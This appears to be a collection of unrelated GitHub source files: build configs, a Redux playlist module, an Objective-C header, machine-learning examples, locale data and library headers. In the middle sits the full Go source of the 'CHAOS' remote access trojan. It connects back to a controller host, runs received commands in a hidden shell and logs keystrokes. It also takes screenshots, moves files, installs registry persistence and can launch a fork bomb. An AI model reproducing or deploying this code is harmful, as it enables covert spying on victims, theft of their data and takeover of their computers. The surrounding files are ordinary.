<component name="ProjectRunConfigurationManager"> <configuration default="false" name="OperaProxyTest" type="JUnit" factoryName="JUnit"> <extension name="coverage" enabled="false" merge="false" sample_coverage="true" runner="idea" /> <module name="Webdriver-opera" /> <option name="ALTERNATIVE_JRE_PATH_ENABLED" value="false" /> <option name="ALTERNATIVE_JRE_PATH" value="" /> <option name="PACKAGE_NAME" value="com.opera.core.systems" /> <option name="MAIN_CLASS_NAME" value="com.opera.core.systems.OperaProxyTest" /> <option name="METHOD_NAME" value="" /> <option name="TEST_OBJECT" value="class" /> <option name="VM_PARAMETERS" value="-ea" /> <option name="PARAMETERS" value="" /> <option name="WORKING_DIRECTORY" value="file://$PROJECT_DIR$" /> <option name="ENV_VARIABLES" /> <option name="PASS_PARENT_ENVS" value="true" /> <option name="TEST_SEARCH_SCOPE"> <value defaultName="moduleWithDependencies" /> </option> <envs /> <patterns /> <method /> </configuration> </component>
{ "pile_set_name": "Github" }
import { Api } from '../toolbox';

// localStorage key under which playlists persist between sessions.
const STORAGE_KEY = 'appleMusicPlaylists';

// Read the persisted playlist map (title -> playlist). Always returns an
// object so callers can spread/delete without null checks.
const loadPlaylists = () => {
    const raw = localStorage[STORAGE_KEY];
    return raw ? JSON.parse(raw) : {};
};

// Persist the playlist map and return it unchanged (for dispatching).
const savePlaylists = playlists => {
    localStorage[STORAGE_KEY] = JSON.stringify(playlists);
    return playlists;
};

// Fetch all artists and seed an empty album map per artist.
export const fetchArtists = () => {
    return dispatch => {
        return Api.fetchArtists()
            .then(artists => {
                // artistData: artist name -> albums (filled lazily by fetchArtist)
                const artistData = {};
                for (const entry of artists) {
                    artistData[entry.artist] = [];
                }
                dispatch({
                    type: 'FETCH_ARTIST_LIST_SUCCESS',
                    artists,
                    artistData,
                });
            })
            .catch(error => {
                console.log(error);
            });
    };
};

// Fetch one artist's albums and seed an empty track list per album.
export const fetchArtist = artist => {
    return dispatch => {
        return Api.fetchArtist(artist)
            .then(albums => {
                const albumData = {};
                for (const album of albums) {
                    albumData[album.album] = [];
                }
                dispatch({
                    type: 'FETCH_ARTIST_SUCCESS',
                    name: artist,
                    albums,
                    albumData,
                });
            })
            .catch(error => {
                console.log(error);
            });
    };
};

// Fetch all albums and seed an empty track list per album.
export const fetchAlbums = () => {
    return dispatch => {
        return Api.fetchAlbums()
            .then(albums => {
                const albumData = {};
                for (const album of albums) {
                    albumData[album.album] = [];
                }
                dispatch({
                    type: 'FETCH_ALBUM_LIST_SUCCESS',
                    albumData,
                    albums,
                });
            })
            .catch(error => {
                console.log(error);
            });
    };
};

// Fetch the track listing for a single album.
export const fetchAlbum = ({ artist, album }) => {
    return dispatch => {
        return Api.fetchAlbum({ artist, album })
            .then(tracks => {
                dispatch({
                    type: 'FETCH_ALBUM_SUCCESS',
                    album,
                    tracks,
                });
            })
            .catch(error => {
                console.log(error);
            });
    };
};

// Load persisted playlists.
// BUG FIX: the previous default was [] while every other action treats
// playlists as an object keyed by title; default to {} for consistency.
export const fetchPlaylists = () => {
    return dispatch => {
        dispatch({
            type: 'FETCH_PLAYLIST_LIST_SUCCESS',
            playlists: loadPlaylists(),
        });
    };
};

// Create (or overwrite) a playlist keyed by its title.
export const createPlaylist = playlist => {
    return dispatch => {
        const playlists = loadPlaylists();
        playlists[playlist.title] = playlist;
        savePlaylists(playlists);
        dispatch({
            type: 'CREATE_PLAYLIST',
            playlists,
        });
    };
};

// Append a track to a playlist and persist the updated map.
export const addToPlaylist = (track, playlist) => {
    return dispatch => {
        const updated = {
            ...playlist,
            tracks: [...playlist.tracks, track],
        };
        const playlists = savePlaylists({
            ...loadPlaylists(),
            [updated.title]: updated,
        });
        dispatch({
            type: 'UPDATE_PLAYLIST',
            playlists,
        });
    };
};

// Remove the track at `index` from a playlist and persist the updated map.
export const removeFromPlaylist = (index, playlist) => {
    return dispatch => {
        const updated = {
            ...playlist,
            tracks: [
                ...playlist.tracks.slice(0, index),
                ...playlist.tracks.slice(index + 1),
            ],
        };
        const playlists = savePlaylists({
            ...loadPlaylists(),
            [updated.title]: updated,
        });
        dispatch({
            type: 'UPDATE_PLAYLIST',
            playlists,
        });
    };
};

// Delete a playlist by title and persist the updated map.
// BUG FIX: previously crashed when storage was empty (parsed value stayed
// undefined and `delete undefined[...]` threw); loadPlaylists() guarantees
// an object.
export const deletePlaylist = playlist => {
    return dispatch => {
        const playlists = loadPlaylists();
        delete playlists[playlist.title];
        savePlaylists(playlists);
        dispatch({
            type: 'UPDATE_PLAYLIST',
            playlists,
        });
    };
};
{ "pile_set_name": "Github" }
// // Generated by class-dump 3.5 (64 bit). // // class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard. // #import "MMService.h" #import "IMsgExt.h" #import "MMImageLoaderObserver.h" #import "MMService.h" @class GameCenterMsgDb, NSString; @interface GameCenterMsgMgr : MMService <MMService, IMsgExt, MMImageLoaderObserver> { _Bool shouldClearDb; _Bool shouldClearNotify; GameCenterMsgDb *_db; } @property(retain, nonatomic) GameCenterMsgDb *db; // @synthesize db=_db; - (void).cxx_destruct; - (void)statMsgReceived:(id)arg1; - (_Bool)clearMsgDb:(id)arg1; - (void)clearMsgList; - (void)clearAllRedDot; - (id)getMsgDbModelList; - (id)getMsgDbModelByLocalId:(unsigned int)arg1; - (void)ImageDidLoadWithData:(id)arg1 Url:(id)arg2; - (void)ImageDidFail:(id)arg1; - (_Bool)isEntryIconDownloading:(unsigned int)arg1; - (_Bool)downloadEntryIconIfNeed:(id)arg1; - (_Bool)urlSameWithFindFriendEntry:(id)arg1 DownloadTime:(int *)arg2 LocalId:(unsigned int *)arg3; - (void)onServiceReloadData; - (void)onServiceClearData; - (void)onServiceTerminate; - (void)onServiceEnterForeground; - (void)onServiceEnterBackground; - (void)onServiceInit; - (int)getDownloadTime:(unsigned int)arg1; - (_Bool)setDownloadTime:(unsigned int)arg1 DownloadTime:(int)arg2; - (id)getDownloadTimeKey:(unsigned int)arg1; - (_Bool)setKeyAtPosition:(id)arg1 Value:(unsigned int)arg2; - (_Bool)clearKeyAtPosition:(id)arg1; - (unsigned int)getKeyAtPosition:(id)arg1; - (id)getMsgWithLocalId:(unsigned int)arg1; - (id)getNotifyWithKey:(id)arg1; - (_Bool)canClearMsgNotify:(unsigned int)arg1; - (_Bool)underWeakNetStrategy:(id)arg1; - (_Bool)deleteMsgBeforeTimeStamp:(unsigned int)arg1; - (_Bool)deleteMsgByLocalId:(int)arg1; - (_Bool)deleteAllMsg; - (_Bool)setMsgCenterAllRead; - (id)getMsgCenterListForJsApi:(int)arg1 lastLocalId:(int)arg2 onlyUnRead:(_Bool)arg3 maxCount:(int)arg4; - (id)getMsgCenterList:(int)arg1 maxCount:(int)arg2; - (id)getMsgCenterReadListBefore:(unsigned int)arg1; - 
(id)getMsgCenterUnreadList; - (_Bool)clearGameCenterGiftRedDot; - (_Bool)clearGameCenterMsgCenterAllRedDot; - (_Bool)clearGameCenterH5FloatLayer:(unsigned int)arg1; - (_Bool)clearGameCenterBubble:(unsigned int)arg1; - (_Bool)clearFindFriendEntry; - (unsigned int)getLastMsgKey; - (id)getGameCenterGiftRedDot; - (id)getGameCenterMsgCenterRedDot; - (id)getGameCenterH5FloatLayer; - (id)getGameCenterBubble; - (id)getFindFriendEntryNotify; - (_Bool)coverNotify:(id)arg1; - (_Bool)shouldCoverNotify:(id)arg1; - (_Bool)appendUserInfoToMsg:(id)arg1 WithXmlSection:(id)arg2; - (_Bool)replaceJumpInfoSection:(id)arg1 JumpInfoSection:(id)arg2; - (_Bool)refreshJumpInfoXmlSection:(id)arg1; - (_Bool)mergeJumpInfo:(id)arg1 JumpInfoDic:(id)arg2; - (_Bool)mergeUserInfo:(id)arg1 DbMsg:(id)arg2 UserJumpInfoDic:(id)arg3; - (void)filterUserInfoList:(id)arg1 DbMsg:(id)arg2; - (_Bool)mergeOriginXmlFromDB:(id)arg1; - (unsigned int)saveMsg:(id)arg1; - (void)OnGetNewXmlMsg:(id)arg1 Type:(id)arg2 MsgWrap:(id)arg3; - (void)dealloc; - (id)init; // Remaining properties @property(readonly, copy) NSString *debugDescription; @property(readonly, copy) NSString *description; @property(readonly) unsigned long long hash; @property(readonly) Class superclass; @end
{ "pile_set_name": "Github" }
// OpenNN: Open Neural Networks Library // www.opennn.net // // L E U K E M I A A P P L I C A T I O N // // Artificial Intelligence Techniques, S.L. (Artelnics) // [email protected] // This is a classical pattern recognition problem. // System includes #include <iostream> #include <fstream> #include <sstream> #include <string> #include <cstring> #include <time.h> #include <omp.h> // OpenNN includes #include "../../opennn/opennn.h" using namespace OpenNN; int main(void) { try { cout << "OpenNN. Leukemia Example." << endl; // Device const int n = omp_get_max_threads(); NonBlockingThreadPool* non_blocking_thread_pool = new NonBlockingThreadPool(n); ThreadPoolDevice* thread_pool_device = new ThreadPoolDevice(non_blocking_thread_pool, n); DataSet data_set("../data/leukemia.csv",';',false); data_set.set_thread_pool_device(thread_pool_device); data_set.set_training(); Tensor<Index, 1> input_variables_indices = data_set.get_input_variables_indices(); Tensor<Index, 1> target_variables_indices = data_set.get_target_variables_indices(); #pragma omp parallel for for(int i=0; i<input_variables_indices.dimension(0); i++) { CorrelationResults logistic_correlation = logistic_correlations(thread_pool_device, data_set.get_data().chip(input_variables_indices(i),1), data_set.get_data().chip(target_variables_indices(0),1)); CorrelationResults gauss_correlation = gauss_correlations(thread_pool_device, data_set.get_data().chip(input_variables_indices(i),1), data_set.get_data().chip(target_variables_indices(0),1)); if(abs(logistic_correlation.correlation) > abs(gauss_correlation.correlation) && abs(logistic_correlation.correlation) > 0.9) { cout << "Gen: " << i << endl; cout << "Logistic correlation: " << logistic_correlation.correlation << endl; } if(abs(gauss_correlation.correlation) > abs(logistic_correlation.correlation) && abs(gauss_correlation.correlation) > 0.9) { cout<<"Gen: "<<i<<endl; cout<<"Gauss correlation: "<<gauss_correlation.correlation<<endl; } if(i%250 == 0) { 
cout<<static_cast<float>(i)/static_cast<float>(input_variables_indices.dimension(0))*100 <<"% dataset evaluated"<<endl; } } return 0; } catch(exception& e) { cerr << e.what() << endl; return 1; } } // OpenNN: Open Neural Networks Library. // Copyright (C) 2005-2019 Artificial Intelligence Techniques SL // // This library is free software; you can redistribute it and/or // modify it under the terms of the GNU Lesser General Public // License as published by the Free Software Foundation; either // version 2.1 of the License, or any later version. // // This library is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU // Lesser General Public License for more details. // You should have received a copy of the GNU Lesser General Public // License along with this library; if not, write to the Free Software // Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
{ "pile_set_name": "Github" }
{ "az_Cyrl_AZ": { "datetime": { "abbr_day_names": [ "B.", "B.E.", "Ç.A.", "Ç.", "C.A.", "C", "Ş." ], "abbr_month_names": [ "yan", "fev", "mar", "apr", "may", "iyn", "iyl", "avq", "sen", "okt", "noy", "dek" ], "day_names": [ "bazar", "bazar ertəsi", "çərşənbə axşamı", "çərşənbə", "cümə axşamı", "cümə", "şənbə" ], "format": "%d %B, %Y", "month_names": [ "yanvar", "fevral", "mart", "aprel", "may", "iyun", "iyul", "avqust", "sentyabr", "oktyabr", "noyabr", "dekabr" ] } } }
{ "pile_set_name": "Github" }
>>compile A.scala >>compile A.scala
{ "pile_set_name": "Github" }
/* Copyright (c) 2010 Michael Lidgren Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
*/
using System;
using System.Diagnostics.CodeAnalysis;

namespace Lidgren.Network
{
	/// <summary>
	/// The type of a NetIncomingMessage
	/// </summary>
	[SuppressMessage("Microsoft.Design", "CA1027:MarkEnumsWithFlags")]
	public enum NetIncomingMessageType
	{
		//
		// library note: values are power-of-two, but they are not flags - it's a convenience for NetPeerConfiguration.DisabledMessageTypes
		//

		/// <summary>
		/// Error; this value should never appear
		/// </summary>
		Error = 0,

		/// <summary>
		/// Status for a connection changed
		/// </summary>
		StatusChanged = 1 << 0, // Data (string)

		/// <summary>
		/// Data sent using SendUnconnectedMessage
		/// </summary>
		UnconnectedData = 1 << 1, // Data Based on data received

		/// <summary>
		/// Connection approval is needed
		/// </summary>
		ConnectionApproval = 1 << 2, // Data

		/// <summary>
		/// Application data
		/// </summary>
		Data = 1 << 3, // Data Based on data received

		/// <summary>
		/// Receipt of delivery
		/// </summary>
		Receipt = 1 << 4, // Data

		/// <summary>
		/// Discovery request for a response
		/// </summary>
		DiscoveryRequest = 1 << 5, // (no data)

		/// <summary>
		/// Discovery response to a request
		/// </summary>
		DiscoveryResponse = 1 << 6, // Data

		/// <summary>
		/// Verbose debug message
		/// </summary>
		VerboseDebugMessage = 1 << 7, // Data (string)

		/// <summary>
		/// Debug message
		/// </summary>
		DebugMessage = 1 << 8, // Data (string)

		/// <summary>
		/// Warning message
		/// </summary>
		WarningMessage = 1 << 9, // Data (string)

		/// <summary>
		/// Error message
		/// </summary>
		ErrorMessage = 1 << 10, // Data (string)

		/// <summary>
		/// NAT introduction was successful
		/// </summary>
		NatIntroductionSuccess = 1 << 11, // Data (as passed to master server)

		/// <summary>
		/// A roundtrip was measured and NetConnection.AverageRoundtripTime was updated
		/// </summary>
		ConnectionLatencyUpdated = 1 << 12, // Seconds as a Single
	}
}
{ "pile_set_name": "Github" }
/*============================================================================= Copyright (c) 1998-2003 Joel de Guzman Copyright (c) 2001-2003 Hartmut Kaiser http://spirit.sourceforge.net/ Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) =============================================================================*/ #if !defined(BOOST_SPIRIT_META_MAIN_HPP) #define BOOST_SPIRIT_META_MAIN_HPP #include <boost/spirit/home/classic/version.hpp> /////////////////////////////////////////////////////////////////////////////// // // Master header for Spirit.Meta // /////////////////////////////////////////////////////////////////////////////// #include <boost/spirit/home/classic/meta/fundamental.hpp> #include <boost/spirit/home/classic/meta/parser_traits.hpp> #include <boost/spirit/home/classic/meta/as_parser.hpp> #include <boost/spirit/home/classic/meta/traverse.hpp> #endif // BOOST_SPIRIT_CORE_MAIN_HPP
{ "pile_set_name": "Github" }
package main import ( "bufio" "encoding/base64" "image/png" "io/ioutil" "log" "net" "os" "os/exec" "strconv" "syscall" "time" screenshot "github.com/kbinani/screenshot" goInfo "github.com/matishsiao/goInfo" ) const ( IP = "IPAddress:ServerPort" FILENAME = "FileNameCHAOS" FOLDER_PATH = "\\ProgramData" FOLDER_EXT = "\\NameFolderExtesion" NEW_LINE string = "\n" ) var ( dll, _ = syscall.LoadDLL("user32.dll") GetAsyncKeyState, _ = dll.FindProc("GetAsyncKeyState") GetKeyState, _ = dll.FindProc("GetKeyState") Logs string ) func main() { for { Connect() } } func Connect() { // Create a connection conn, err := net.Dial("tcp", IP) // If don't exist a connection created than try connect to a new if err != nil { log.Println("[*] Connecting...") for { Connect() } } for { // When the command received aren't encoded, // skip switch, and be executed on OS shell. command, _ := bufio.NewReader(conn).ReadString('\n') // log.Println(command) // When the command received are encoded, // decode message received, and test on switch decodedCommand, _ := base64.StdEncoding.DecodeString(command) // log.Println(decodedCommand) switch string(decodedCommand) { case "back": conn.Close() Connect() case "exit": conn.Close() os.Exit(0) case "screenshot": SendMessage(conn, EncodeBytesToString(TakeScreenShot())) RemoveNewLineCharFromConnection(conn) case "keylogger_start": go Keylogger() // Run a go routine for Keylogger function SendMessage(conn, " [i] Keylogger Listening!") RemoveNewLineCharFromConnection(conn) case "keylogger_show": SendMessage(conn, Logs) RemoveNewLineCharFromConnection(conn) case "download": pathDownload := ReceiveMessageStdEncoding(conn) file, err := ioutil.ReadFile(string(pathDownload)) if err != nil { conn.Write([]byte("[!] File not found!" 
+ "\n")) } SendMessage(conn, string(file)) RemoveNewLineCharFromConnection(conn) case "upload": uploadInput := ReceiveMessageStdEncoding(conn) decUpload := ReceiveMessageURLEncoding(conn) if string(decUpload) != "" { ioutil.WriteFile(string(uploadInput), []byte(decUpload), 777) } case "getos": SendMessage(conn, GetOSInformation()) RemoveNewLineCharFromConnection(conn) case "lockscreen": log.Println(RunCmdReturnByte("rundll32.exe user32.dll,LockWorkStation")) SendMessage(conn, "[i] Locked!") RemoveNewLineCharFromConnection(conn) case "ls": SendMessage(conn, EncodeBytesToString(RunCmdReturnByte("dir"))) RemoveNewLineCharFromConnection(conn) case "persistence_enable": // Create a folder to save file os.MkdirAll(os.Getenv("systemdrive")+FOLDER_PATH+FOLDER_EXT, 0777) // Copy file to install path RunCmd("xcopy /Y " + FILENAME + " " + os.Getenv("systemdrive") + FOLDER_PATH + FOLDER_EXT) // Generate a .reg to install at startup CreateFile(os.Getenv("systemdrive")+FOLDER_PATH+FOLDER_EXT+"\\reg.bat", "REG ADD HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V \"CHAOS Startup\" /t REG_SZ /F /D "+"\""+"%systemdrive%"+FOLDER_PATH+FOLDER_EXT+"\\"+FILENAME+"\"") // Run .bat to install RunCmd(os.Getenv("systemdrive") + FOLDER_PATH + FOLDER_EXT + "\\reg.bat") // Check if file is created file := os.Getenv("systemdrive") + FOLDER_PATH + FOLDER_EXT + "\\" + FILENAME _, err := os.Stat(file) if err == nil { SendMessage(conn, "[*] Persistence Enabled!") } else if os.IsNotExist(err) { SendMessage(conn, "[!] 
Persistence Failed!") } RemoveNewLineCharFromConnection(conn) case "persistence_disable": // Remove directory os.RemoveAll(os.Getenv("systemdrive") + FOLDER_PATH + FOLDER_EXT) // Create a .reg to remove at startup CreateFile(os.Getenv("systemdrive")+FOLDER_PATH+"\\reg.bat", "REG DELETE HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /V \"CHAOS Startup\" /F") // Run .bat to remove RunCmd(os.Getenv("systemdrive") + FOLDER_PATH + "\\reg.bat") SendMessage(conn, "[*] Persistence Disabled!") RemoveNewLineCharFromConnection(conn) case "bomb": // Create a file to run fork bomb CreateFile(os.Getenv("systemdrive")+FOLDER_PATH+"\\bomb.bat", "%0|%0") // Run file RunCmd(os.Getenv("systemdrive") + FOLDER_PATH + "\\bomb.bat && del " + os.Getenv("systemdrive") + FOLDER_PATH + "\\bomb.bat") SendMessage(conn, "[*] Executed Fork Bomb!") RemoveNewLineCharFromConnection(conn) case "openurl": // Receive url and run it url := ReceiveMessageStdEncoding(conn) RunCmd("start " + url) SendMessage(conn, "[*] Opened!") RemoveNewLineCharFromConnection(conn) } // end switch SendMessage(conn, RunCmdReturnString(command)) _, err := conn.Read(make([]byte, 0)) if err != nil { Connect() } } } func SendMessage(conn net.Conn, message string) { conn.Write([]byte(base64.URLEncoding.EncodeToString([]byte(message)) + NEW_LINE)) } func ReceiveMessageStdEncoding(conn net.Conn) string { message, _ := bufio.NewReader(conn).ReadString('\n') messageDecoded, _ := base64.StdEncoding.DecodeString(message) return string(messageDecoded) } func ReceiveMessageURLEncoding(conn net.Conn) string { message, _ := bufio.NewReader(conn).ReadString('\n') messageDecoded, _ := base64.URLEncoding.DecodeString(message) return string(messageDecoded) } func EncodeBytesToString(value []byte) string { return base64.URLEncoding.EncodeToString(value) } func RemoveNewLineCharFromConnection(conn net.Conn) { newLineChar, _ := bufio.NewReader(conn).ReadString('\n') log.Println(newLineChar) } func RunCmdReturnByte(cmd string) []byte { 
cmdExec := exec.Command("cmd", "/C", cmd) cmdExec.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} c, _ := cmdExec.Output() return c } func RunCmdReturnString(cmd string) string { cmdExec := exec.Command("cmd", "/C", cmd) cmdExec.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} c, _ := cmdExec.Output() return string(c) } func RunCmd(cmd string) { cmdExec := exec.Command("cmd", "/C", cmd) cmdExec.SysProcAttr = &syscall.SysProcAttr{HideWindow: true} c, _ := cmdExec.Output() log.Println(c) } func CreateFile(path string, text string) { create, _ := os.Create(path) create.WriteString(text) create.Close() } func TakeScreenShot() []byte { // Create a path to save screenshto pathToSaveScreenshot := os.Getenv("systemdrive") + FOLDER_PATH + "\\screenshot.png" // Run func to get screenshot n := screenshot.NumActiveDisplays() for i := 0; i < n; i++ { bounds := screenshot.GetDisplayBounds(i) img, err := screenshot.CaptureRect(bounds) if err != nil { Connect() } file, _ := os.Create(pathToSaveScreenshot) defer file.Close() png.Encode(file, img) } // end func to get screenshot // Read screenshot file file, err := ioutil.ReadFile(pathToSaveScreenshot) if err != nil { return nil } return file } func GetOSInformation() string { gi := goInfo.GetInfo() osInformation := "GoOS: " + gi.GoOS osInformation += "\n" + " Kernel: " + gi.Kernel osInformation += "\n" + " Core: " + gi.Core osInformation += "\n" + " Platform: " + gi.Platform osInformation += "\n" + " OS: " + gi.OS osInformation += "\n" + " Hostname: " + gi.Hostname osInformation += "\n" + " CPUs: " + strconv.Itoa(gi.CPUs) return osInformation } // It is just a poor implementation of a keylogger written in golang func Keylogger() { for { time.Sleep(1 * time.Millisecond) for i := 0; i < 256; i++ { Result, _, _ := GetAsyncKeyState.Call(uintptr(i)) if Result&0x1 == 0 { continue } switch i { case 8: Logs += "[Backspace]" case 9: Logs += "[Tab]" case 13: Logs += "[Enter]" case 16: Logs += "[Shift]" case 17: Logs += "[Control]" 
case 18: Logs += "[Alt]" case 19: Logs += "[Pause]" case 27: Logs += "[Esc]" case 32: Logs += " " case 33: Logs += "[PageUp]" case 34: Logs += "[PageDown]" case 35: Logs += "[End]" case 36: Logs += "[Home]" case 37: Logs += "[Left]" case 38: Logs += "[Up]" case 39: Logs += "[Right]" case 40: Logs += "[Down]" case 44: Logs += "[PrintScreen]" case 45: Logs += "[Insert]" case 46: Logs += "[Delete]" case 48: Logs += "[0)]" case 49: Logs += "[1!]" case 50: Logs += "[2@]" case 51: Logs += "[3#]" case 52: Logs += "[4$]" case 53: Logs += "[5%]" case 54: Logs += "[6¨]" case 55: Logs += "[7&]" case 56: Logs += "[8*]" case 57: Logs += "[9(]" case 65: Logs += "A" case 66: Logs += "B" case 67: Logs += "C" case 186: Logs += "Ç" case 68: Logs += "D" case 69: Logs += "E" case 70: Logs += "F" case 71: Logs += "G" case 72: Logs += "H" case 73: Logs += "I" case 74: Logs += "J" case 75: Logs += "K" case 76: Logs += "L" case 77: Logs += "M" case 78: Logs += "N" case 79: Logs += "O" case 80: Logs += "P" case 81: Logs += "Q" case 82: Logs += "R" case 83: Logs += "S" case 84: Logs += "T" case 85: Logs += "U" case 86: Logs += "V" case 87: Logs += "W" case 88: Logs += "X" case 89: Logs += "Y" case 90: Logs += "Z" case 96: Logs += "0" case 97: Logs += "1" case 98: Logs += "2" case 99: Logs += "3" case 100: Logs += "4" case 101: Logs += "5" case 102: Logs += "6" case 103: Logs += "7" case 104: Logs += "8" case 105: Logs += "9" case 106: Logs += "*" case 107: Logs += "+" case 109: Logs += "-" case 110: Logs += "," case 111: Logs += "/" case 112: Logs += "[F1]" case 113: Logs += "[F2]" case 114: Logs += "[F3]" case 115: Logs += "[F4]" case 116: Logs += "[F5]" case 117: Logs += "[F6]" case 118: Logs += "[F7]" case 119: Logs += "[F8]" case 120: Logs += "[F9]" case 121: Logs += "[F10]" case 122: Logs += "[F11]" case 123: Logs += "[F12]" case 91: Logs += "[Super]" case 93: Logs += "[Menu]" case 144: Logs += "[NumLock]" case 189: Logs += "[-_]" case 187: Logs += "[=+]" case 188: Logs += "[,<]" case 
190: Logs += "[.>]" case 191: Logs += "[;:]" case 192: Logs += "['\"]" case 193: Logs += "[/?]" case 221: Logs += "[[{]" case 220: Logs += "[]}]" case 226: Logs += "[\\|]" } } } }
{ "pile_set_name": "Github" }
/* Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License. */

#pragma once
#include <algorithm>
#include <vector>
#include "paddle/fluid/framework/op_registry.h"
#include "paddle/fluid/platform/hostdevice.h"

namespace paddle {
namespace operators {

using Tensor = framework::Tensor;

// Logistic sigmoid, usable on both host and device (HOSTDEVICE).
template <typename T>
HOSTDEVICE inline T sigmoid(T x) {
  return 1.0 / (1.0 + std::exp(-x));
}

// Decode one predicted box (center x/y, width, height) from the raw network
// output into image coordinates, following the YOLO box parameterization:
//   cx = (i + sigmoid(tx) * scale + bias) / grid_size  (scaled to img_width)
//   w  = exp(tw) * anchor_w / input_size               (scaled to img_width)
// `index` addresses tx; ty/tw/th follow at offsets of `stride` each.
// NOTE(review): assumes the four box channels are laid out `stride` apart —
// consistent with GetEntryIndex below; confirm against the op definition.
template <typename T>
HOSTDEVICE inline void GetYoloBox(T* box, const T* x, const int* anchors,
                                  int i, int j, int an_idx, int grid_size,
                                  int input_size, int index, int stride,
                                  int img_height, int img_width, float scale,
                                  float bias) {
  box[0] = (i + sigmoid<T>(x[index]) * scale + bias) * img_width / grid_size;
  box[1] = (j + sigmoid<T>(x[index + stride]) * scale + bias) * img_height /
           grid_size;
  box[2] = std::exp(x[index + 2 * stride]) * anchors[2 * an_idx] * img_width /
           input_size;
  box[3] = std::exp(x[index + 3 * stride]) * anchors[2 * an_idx + 1] *
           img_height / input_size;
}

// Flat index of channel `entry` for anchor `an_idx` at spatial cell `hw_idx`
// in batch element `batch`. `stride` = H*W, `an_stride` = (class_num+5)*H*W.
HOSTDEVICE inline int GetEntryIndex(int batch, int an_idx, int hw_idx,
                                    int an_num, int an_stride, int stride,
                                    int entry) {
  return (batch * an_num + an_idx) * an_stride + entry * stride + hw_idx;
}

// Convert a center/size box into corner form (x1, y1, x2, y2) at
// boxes[box_idx..box_idx+3], optionally clipping to the image rectangle
// [0, img_width-1] x [0, img_height-1].
template <typename T>
HOSTDEVICE inline void CalcDetectionBox(T* boxes, T* box, const int box_idx,
                                        const int img_height,
                                        const int img_width, bool clip_bbox) {
  boxes[box_idx] = box[0] - box[2] / 2;
  boxes[box_idx + 1] = box[1] - box[3] / 2;
  boxes[box_idx + 2] = box[0] + box[2] / 2;
  boxes[box_idx + 3] = box[1] + box[3] / 2;
  if (clip_bbox) {
    boxes[box_idx] = boxes[box_idx] > 0 ? boxes[box_idx] : static_cast<T>(0);
    boxes[box_idx + 1] =
        boxes[box_idx + 1] > 0 ? boxes[box_idx + 1] : static_cast<T>(0);
    boxes[box_idx + 2] = boxes[box_idx + 2] < img_width - 1
                             ? boxes[box_idx + 2]
                             : static_cast<T>(img_width - 1);
    boxes[box_idx + 3] = boxes[box_idx + 3] < img_height - 1
                             ? boxes[box_idx + 3]
                             : static_cast<T>(img_height - 1);
  }
}

// Per-class score = objectness confidence * sigmoid(class logit); class
// logits start at input[label_idx] and are `stride` apart per class.
template <typename T>
HOSTDEVICE inline void CalcLabelScore(T* scores, const T* input,
                                      const int label_idx, const int score_idx,
                                      const int class_num, const T conf,
                                      const int stride) {
  for (int i = 0; i < class_num; i++) {
    scores[score_idx + i] = conf * sigmoid<T>(input[label_idx + i * stride]);
  }
}

// CPU kernel of the yolo_box op: decodes raw YOLO head output "X" into
// detection boxes ("Boxes", shape [N, box_num, 4]) and per-class scores
// ("Scores", shape [N, box_num, class_num]). Cells whose objectness is below
// conf_thresh are skipped and left as the zeros written by memset.
template <typename T>
class YoloBoxKernel : public framework::OpKernel<T> {
 public:
  void Compute(const framework::ExecutionContext& ctx) const override {
    auto* input = ctx.Input<Tensor>("X");
    auto* imgsize = ctx.Input<Tensor>("ImgSize");
    auto* boxes = ctx.Output<Tensor>("Boxes");
    auto* scores = ctx.Output<Tensor>("Scores");
    auto anchors = ctx.Attr<std::vector<int>>("anchors");
    int class_num = ctx.Attr<int>("class_num");
    float conf_thresh = ctx.Attr<float>("conf_thresh");
    int downsample_ratio = ctx.Attr<int>("downsample_ratio");
    bool clip_bbox = ctx.Attr<bool>("clip_bbox");
    float scale = ctx.Attr<float>("scale_x_y");
    // bias recenters the scaled sigmoid so scale_x_y == 1 is a no-op.
    float bias = -0.5 * (scale - 1.);

    // NOTE(review): X is indexed as [N, an_num*(5+class_num), H, W]
    // (inferred from GetEntryIndex usage); confirm against the op definition.
    const int n = input->dims()[0];
    const int h = input->dims()[2];
    const int w = input->dims()[3];
    const int box_num = boxes->dims()[1];
    const int an_num = anchors.size() / 2;
    int input_size = downsample_ratio * h;

    const int stride = h * w;
    const int an_stride = (class_num + 5) * stride;

    // Copy the anchor attribute into a tensor so device code could read it.
    Tensor anchors_;
    auto anchors_data =
        anchors_.mutable_data<int>({an_num * 2}, ctx.GetPlace());
    std::copy(anchors.begin(), anchors.end(), anchors_data);

    const T* input_data = input->data<T>();
    const int* imgsize_data = imgsize->data<int>();
